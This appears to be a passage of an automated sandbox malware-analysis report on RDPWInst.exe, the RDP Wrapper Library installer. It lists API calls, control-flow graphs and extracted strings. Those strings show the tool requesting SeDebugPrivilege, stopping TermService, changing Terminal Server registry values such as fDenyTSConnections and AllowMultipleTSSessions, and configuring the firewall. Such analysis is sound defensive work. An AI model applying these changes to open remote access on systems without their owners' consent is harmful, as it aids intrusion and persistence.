                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3216391948-0
                                                                                                                                                        • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                                                                        • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                                                                                        • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                                                                        • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                        • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                                                                        • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                                                                                                                        • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                                                                        • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                        • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                                                                        • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                                                                                                                        • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                                                                        • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 0 44373c-44373f 1 443744-443749 0->1 1->1 2 44374b-4437d0 call 40a2b0 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404504 1->2 31 443876-443965 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 2->31 32 4437d6-4437f0 call 404564 call 4072a4 2->32 105 443f97-443fb1 call 406be8 31->105 42 4437f6-443810 call 404564 call 4072a4 32->42 43 44396a-443984 call 404564 call 4072a4 32->43 42->43 59 443816-443830 call 404564 call 4072a4 42->59 56 443986-4439a7 call 43cea4 call 407450 call 404cdc call 4042f8 43->56 57 4439ac-4439ba call 414708 43->57 56->105 68 4439bc-4439e8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 57->68 69 4439ed-4439f4 call 43a644 57->69 59->43 79 443836-443850 call 404564 call 4072a4 59->79 68->105 83 4439f6-443a0c call 407450 call 404cdc call 4042f8 69->83 84 443a11-443a30 call 43a7bc call 404564 call 4072a4 69->84 79->43 111 443856-443870 call 404564 call 4072a4 79->111 83->105 127 443cc4-443cde call 404564 call 4072a4 84->127 128 443a36-443a3d 84->128 111->31 111->43 150 443ce4-443ceb 127->150 151 443e6b-443e85 call 404564 call 4072a4 127->151 133 443a5f-443b13 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 128->133 134 443a3f-443a5a call 407450 call 404cdc call 4042f8 call 40632c 128->134 354 443b15-443b24 call 406bf0 133->354 355 443b26-443b30 call 406bf0 133->355 134->133 156 443d0d-443d2a call 407450 call 404cdc call 4042f8 150->156 157 443ced-443d08 call 407450 call 404cdc call 4042f8 call 40632c 150->157 177 443e87-443e8e 151->177 178 443ecb-443ee5 call 404564 call 4072a4 151->178 201 443d31-443dac call 43b7d4 call 407450 call 404cdc call 4042f8 call 43c9b4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 407450 call 404cdc call 4042f8 call 43d938 call 40816c 156->201 202 443d2c call 43a688 156->202 157->156 184 443eb0-443ec6 call 407450 call 404cdc call 4042f8 call 43f7a4 177->184 185 443e90-443eab call 407450 call 404cdc call 4042f8 call 40632c 177->185 178->105 215 443eeb-443f46 call 407450 call 404cdc call 4042f8 call 43b7d4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 178->215 184->178 185->184 343 443dd3-443e0b Sleep call 43b58c Sleep call 404564 call 4072a4 201->343 344 443dae-443dbd call 40816c 201->344 202->201 303 443f6d-443f92 Sleep call 43b58c call 407450 call 404cdc call 4042f8 215->303 304 443f48-443f57 call 40816c 215->304 303->105 304->303 318 443f59-443f5a 304->318 323 443f5c-443f6b call 43b58c 318->323 323->303 366 443e47-443e4e 343->366 367 443e0d-443e42 call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 343->367 344->343 353 443dbf-443dc0 344->353 357 443dc2-443dd1 call 43b58c 353->357 365 443b35-443b3c 354->365 355->365 357->343 368 443b43-443b7d call 43de78 call 43b7d4 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 365->368 369 443b3e call 43a688 365->369 370 443e55-443e66 call 407450 call 404cdc call 4042f8 366->370 371 443e50 call 43a724 366->371 367->366 408 443b9f 368->408 409 443b7f-443b99 call 404564 call 4072a4 368->409 369->368 370->151 371->370 410 443ba1-443c21 call 43d0f8 call 407450 call 404cdc call 4042f8 call 43c598 call 407450 call 404cdc call 4042f8 call 43e7dc call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 408->410 409->408 418 443b9b-443b9d 409->418 446 443c23-443c32 call 40816c 410->446 447 443c48-443c9b Sleep call 43b58c Sleep call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 410->447 418->410 446->447 452 443c34-443c35 446->452 471 443ca0-443cbd call 407450 call 404cdc call 4042f8 447->471 454 443c37-443c46 call 43b58c 452->454 454->447 471->127 478 443cbf call 43a724 471->478 478->127
                                                                                                                                                        Strings
                                                                                                                                                        • $sD, xrefs: 00443761
                                                                                                                                                        • [*] Extracting files..., xrefs: 00443B4F
                                                                                                                                                        • -u uninstall wrapper, xrefs: 00443925
                                                                                                                                                        • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                                                                                        • [+] Done., xrefs: 00443F83
                                                                                                                                                        • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                                                                                        • -w get latest update for INI file, xrefs: 0044390F
                                                                                                                                                        • [*] Installing..., xrefs: 00443AE5
                                                                                                                                                        • [*] Checking for updates..., xrefs: 00443EB2
                                                                                                                                                        • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                                                                                        • [+] Successfully installed., xrefs: 00443CA2
                                                                                                                                                        • license, xrefs: 00443989
                                                                                                                                                        • [*] Resetting service library..., xrefs: 00443D38
                                                                                                                                                        • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                                                                                        • LpD, xrefs: 0044374F
                                                                                                                                                        • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                                                                                        • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                                                                                        • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                                                                                        • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                                                                                        • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                                                                                        • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                                                                                        • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                                                                                        • [*] Restarting..., xrefs: 00443EED
                                                                                                                                                        • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                                                                                        • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                                                                                        • [*] Removing files..., xrefs: 00443D87
                                                                                                                                                        • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                                                                                        • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                                                                                        • [*] Notice to user:, xrefs: 00443A61
                                                                                                                                                        • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                                                                                        • do not use the software., xrefs: 00443ACF
                                                                                                                                                        • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                                                                                        • -r force restart Terminal Services, xrefs: 00443951
                                                                                                                                                        • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                                                                                        • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                                                                                        • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                                                                                        • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                                                                                        • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                                                                                        • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                                                                                        • Installer v2.5, xrefs: 0044378D
                                                                                                                                                        • USAGE:, xrefs: 00443878
                                                                                                                                                        • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                                                                                        • -l display the license agreement, xrefs: 004438B7
                                                                                                                                                        • [*] Configuring service library..., xrefs: 00443BAD
                                                                                                                                                        • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                                                                                        • [*] Uninstalling..., xrefs: 00443D0F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                                                                                        • API String ID: 0-551293883
                                                                                                                                                        • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                                                                        • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                                                                                                                        • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                                                                        • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 480 43e864-43e877 481 43e879-43e88d call 4387ec 480->481 482 43e88f-43e89b call 4387a8 480->482 487 43e89e-43e8bc call 438890 call 4389d8 481->487 482->487 492 43e8fa-43e95f call 4396b8 call 438860 487->492 493 43e8be-43e8f5 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 487->493 504 43ed53-43ed61 call 40518c 492->504 505 43e965-43e976 call 4389d8 492->505 493->492 513 43e9b4-43ea21 call 4396b8 call 438860 call 4389d8 505->513 514 43e978-43e9af GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 505->514 533 43ea23-43ea5a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 513->533 534 43ea5f-43eac3 call 4396b8 call 438860 call 439d1c 513->534 514->513 533->534 550 43eac8-43eaca 534->550 550->504 552 43ead0-43eae1 call 4389d8 550->552 558 43eae3-43eb1a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 552->558 559 43eb1f-43eb38 call 438860 call 4389d8 552->559 558->559 569 43eb76-43ebf8 call 4392f0 call 439674 call 438860 call 4389d8 559->569 570 43eb3a-43eb71 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 559->570 596 43ec36-43ecb8 call 4392f0 call 439674 call 438860 call 4389d8 569->596 597 43ebfa-43ec31 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 569->597 570->569 618 43ecf6-43ed4e call 439674 call 438860 596->618 619 43ecba-43ecf1 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 596->619 597->596 618->504 619->618
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                        • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                                                                                        • API String ID: 1452528299-1114397459
                                                                                                                                                        • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                                                                        • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                                                                                                                        • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                                                                        • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1085 408f6c-408f95 call 406bd8 1088 408f97-408faa GetModuleFileNameW 1085->1088 1089 408fac-408fc1 call 406c7c lstrcpynW 1085->1089 1090 408fc6-408fce 1088->1090 1089->1090 1093 408fd4-408ff5 RegOpenKeyExW 1090->1093 1094 40913b-409150 call 406be0 1090->1094 1096 409055-40908f call 408d70 RegQueryValueExW 1093->1096 1097 408ff7-409013 RegOpenKeyExW 1093->1097 1104 409091-4090c2 call 4041b0 RegQueryValueExW call 406d9c 1096->1104 1105 4090c4-4090de RegQueryValueExW 1096->1105 1097->1096 1098 409015-409031 RegOpenKeyExW 1097->1098 1098->1096 1101 409033-40904f RegOpenKeyExW 1098->1101 1101->1094 1101->1096 1107 40910f-409120 1104->1107 1106 4090e0-40910a call 4041b0 RegQueryValueExW call 406d9c 1105->1106 1105->1107 1106->1107 1112 409122-409125 call 4041cc 1107->1112 1113 40912a-409133 RegCloseKey 1107->1113 1112->1113
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                                                                        • API String ID: 3482678030-345420546
                                                                                                                                                        • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                                                                        • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                                                                                        • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                                                                        • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                                                                                        • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                                                                                          • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                                                          • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$CloseFlush
                                                                                                                                                        • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                                                                                        • API String ID: 1149308822-2563127478
                                                                                                                                                        • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                                                                        • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                                                                                        • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                                                                        • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
